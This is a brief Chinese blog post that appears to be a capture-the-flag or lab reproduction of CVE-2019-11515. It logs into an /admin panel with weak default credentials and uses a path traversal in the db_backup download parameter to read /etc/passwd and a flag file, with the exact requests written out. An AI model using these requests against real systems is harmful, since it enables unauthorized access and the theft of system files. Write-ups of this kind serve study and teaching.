CVE-2019-11515

CVE-2019-11515复现
image

打开网站,访问/admin目录
image

使用弱密码admin@admin.com/admin 登录,用户名邮箱是题目给的
image

使用admin/db_backup?download=/etc/passwd来下载敏感数据
image

下载flag,要加../,应该是在根目录的原因
admin/db_backup?download=../../../flag
image

posted @ 2026-02-18 00:10  大雪深埋  阅读(8)  评论(0)    收藏  举报
// 正常配置 window.cnblogsConfig = { links: {}, }; // 友链页配置 window.cnblogsConfig.links.page = [ { title: '友情链接', // 标题 icon: 'icon-lianjie', // iconfont style: 'color: #a78bfa;', links: [ { name: '2_haowen_V', // 昵称 introduction: 'IT技术类博客', // 简介 avatar: 'https://pic.cnblogs.com/face/1334215/20180504110551.png', // 头像 url: 'https://www.hehaowen.com.cn/' // 友链地址 }, ] }, ];